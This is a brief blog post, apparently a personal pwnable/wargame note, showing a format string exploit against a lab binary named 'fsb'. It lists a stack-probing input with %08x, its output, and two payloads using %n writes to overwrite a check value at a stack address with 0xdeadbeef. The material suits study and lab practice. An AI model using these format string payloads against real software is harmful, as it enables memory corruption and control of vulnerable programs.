-
FSB TIPSHACK/PWNABLE 2019. 3. 24. 22:26
[0xbffffa98] -> [0xdeadbeef]
[input]
./fsb "`python -c 'print "AAAA" + " %08x"*9'`"
[output]
check at 0xbffffa98
argv[1] = [AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x]
fmt=[AAAA b7fdc4a0 00000001 00000000 00000001 bffffbd4 00000000 00000000 04030201 41414141]
check=0x4030201
[payload 1]
./fsb `python -c 'print "\x98\xfa\xff\xbf"+"AAAA"+"\x9a\xfa\xff\xbf"+"%08x"*7+"%48811c%n%8126c%n"'`
[payload 2]
./fsb `python -c 'print "\x98\xfa\xff\xbf\x9a\xfa\xff\xbf" + "%48871x%9$n%8126x%10$n"'`
'HACK > PWNABLE' 카테고리의 다른 글
x64/execve Shellcode (24 bytes) (0) 2019.04.10 GDB attach with pwntool s (0) 2019.04.09 nc 서버 오픈(xinetd) (0) 2019.01.29 Retsled + Findenv (0) 2018.07.17 24Byte Shellcode (0) 2018.06.25